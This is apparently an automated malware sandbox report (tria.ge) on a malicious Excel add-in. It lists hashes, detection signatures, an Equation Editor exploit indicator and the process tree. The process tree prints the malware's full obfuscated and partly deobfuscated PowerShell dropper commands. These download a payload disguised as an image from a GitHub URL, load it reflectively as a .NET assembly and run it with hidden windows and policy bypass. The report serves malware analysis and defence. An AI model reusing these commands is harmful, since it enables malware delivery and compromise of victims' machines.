Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    61s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    13/10/2024, 01:58

General

  • Target

    f3ca53807f32ccbc241ce2b92d7ab0727cfdf45e3fd88b9e3ac9a063f0aff086.xlam

  • Size

    736KB

  • MD5

    7c34b23b4b7cb66c2393128c3f55a0e1

  • SHA1

    2cf918f985476c7d3988b7d2ac530d32c59de12d

  • SHA256

    f3ca53807f32ccbc241ce2b92d7ab0727cfdf45e3fd88b9e3ac9a063f0aff086

  • SHA512

    cd2d8d1f2e3accb677bed9be2a335253240458babedb514d88f31e980ed2740ebe586463fecf06ce5e3670ac430b1c54faf48732d29a98abeca28dae9daf537b

  • SSDEEP

    12288:4gDGK/3uJ3WSZvFsxoHXYo1NmcCYlnjeRKZLImngMVTGckDI:jqKg35DHoojmcCEnjeyLImnLVTv

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f3ca53807f32ccbc241ce2b92d7ab0727cfdf45e3fd88b9e3ac9a063f0aff086.xlam
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2256
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2872
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\mediciniiiiiffredating.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2932
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd5akxpbWFnZVVybCA9IFlxTGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZWFkcy9tYWluL0RldGFoTm90ZV9WLmpwZyBZcUw7eWpMd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWUnKydudDt5akxpbWFnZUInKyd5dGVzID0geWpMd2ViQ2xpZW50LkRvd25sb2FkRGF0YSh5akxpbWFnZVVybCk7eWpMaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoeWpMaW1hZ2VCeXRlcyk7eWonKydMc3QnKydhcnRGbGFnID0gWXFMPDxCQVNFNjRfU1RBUlQnKyc+PllxTDt5akxlbmRGbGFnID0gWXFMPDxCQVNFNjRfRU5EPj5ZcUw7eWpMc3RhcnRJbmRleCA9IHlqTGltYWdlVGV4dC5JbmRleE9mKHknKydqTHN0YXJ0RmxhZyk7eWpMZW5kSW5kZXggPSB5akxpbWFnZVRleHQuSW5kZXhPZih5akxlbmRGbGFnKTt5akxzdGFydEluZGV4IC1nZSAwIC1hbmQgeWpMZScrJ25kSScrJ25kZXggLWd0IHlqTHN0YXJ0SW5kZXg7eWpMcycrJ3RhcnRJbmRleCArPSB5akxzdGFydEZsYWcnKycuTGVuZ3RoO3lqTGJhc2U2NExlbmd0aCA9IHlqTGVuZEluZGV4IC0geWpMc3RhcnRJbmRleDt5akxiYXNlNjRDb21tYW5kID0geWpMaW1hZ2VUZXh0LlN1YnN0cmluZyh5akxzdGEnKydydEluZGV4LCB5akxiYXNlNjRMZW5ndGgnKycpO3lqTGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNicrJzRTdHJpbmcoeWonKydMYmFzJysnZTY0Q29tbWFuZCk7eWpMbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHlqTGNvJysnbW1hbmRCeXRlcyk7eWpMdmFpTScrJ2V0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChZcUxWQUlZcUwpO3lqTHZhaU1ldGhvZC5JbnZva2UoJysneWpMbnVsbCwgJysnQChZcUx0eHQuNDQ0NDZlc2EnKydiJysnYmJiYmJld21hZGFtLzQzMS44NzEuNjQuODkxLy86cHR0aFlxTCwgWXFMZGVzYXRpdmFkb1lxTCwgWXFMZGVzYXRpdmFkb1lxTCwgWXFMZGVzYXRpdmFkb1lxTCwgWXFMQWRkSW5Qcm9jZXNzMzJZcUwsIFlxTGRlc2F0aXZhZG9ZcUwsIFlxTGRlc2F0aXZhZG9ZcUwpKTsnKS5SZVBsYUNFKCd5akwnLCckJykuUmVQbGFDRSgnWXFMJyxbc3RSSU5HXVtDaEFyXTM5KSB8IGlleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2868
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('yjLimageUrl = YqLhttps://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg YqL;yjLwebClient = New-Object System.Net.WebClie'+'nt;yjLimageB'+'ytes = yjLwebClient.DownloadData(yjLimageUrl);yjLimageText = [System.Text.Encoding]::UTF8.GetString(yjLimageBytes);yj'+'Lst'+'artFlag = YqL<<BASE64_START'+'>>YqL;yjLendFlag = YqL<<BASE64_END>>YqL;yjLstartIndex = yjLimageText.IndexOf(y'+'jLstartFlag);yjLendIndex = yjLimageText.IndexOf(yjLendFlag);yjLstartIndex -ge 0 -and yjLe'+'ndI'+'ndex -gt yjLstartIndex;yjLs'+'tartIndex += yjLstartFlag'+'.Length;yjLbase64Length = yjLendIndex - yjLstartIndex;yjLbase64Command = yjLimageText.Substring(yjLsta'+'rtIndex, yjLbase64Length'+');yjLcommandBytes = [System.Convert]::FromBase6'+'4String(yj'+'Lbas'+'e64Command);yjLloadedAssembly = [System.Reflection.Assembly]::Load(yjLco'+'mmandBytes);yjLvaiM'+'ethod = [dnlib.IO.Home].GetMethod(YqLVAIYqL);yjLvaiMethod.Invoke('+'yjLnull, '+'@(YqLtxt.44446esa'+'b'+'bbbbbewmadam/431.871.64.891//:ptthYqL, YqLdesativadoYqL, YqLdesativadoYqL, YqLdesativadoYqL, YqLAddInProcess32YqL, YqLdesativadoYqL, YqLdesativadoYqL));').RePlaCE('yjL','$').RePlaCE('YqL',[stRING][ChAr]39) | iex"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2772

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    53143954570c9507ef372f2506c56772

    SHA1

    aed624cca6e5ff06c8eded5d06bd5d84db3c7c64

    SHA256

    3568d8a5e8d5e26d16aaed26195aeee24cafb9b867de69d521f23336200641c0

    SHA512

    afce48ff53df539214002df623598bc961b42242ec1ab0778d2df1caf6b46a8cd75512628cc0e61370bb20a68ea85be7bda6447e9c7210ddda493b5be46d7554

  • C:\Users\Admin\AppData\Roaming\mediciniiiiiffredating.vbs

    Filesize

    189KB

    MD5

    ba21082c47f33b42f6243198bea92684

    SHA1

    d0a7314525f30708cffd5273feb1fc24ff33523c

    SHA256

    6be117567324f1c1db4f2cbf48a25a3eaa24904238a37ab3b5e49b6970078b65

    SHA512

    dc21e6b490cb9f1b262622c28da8d8ce087bf1357b3f939f2e4fbe5339cd647045b4c89aeeb2543097b4b688643fead1547de59583659c16c5a8d0d530e54217

  • memory/2256-1-0x000000007233D000-0x0000000072348000-memory.dmp

    Filesize

    44KB

  • memory/2256-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2256-16-0x000000007233D000-0x0000000072348000-memory.dmp

    Filesize

    44KB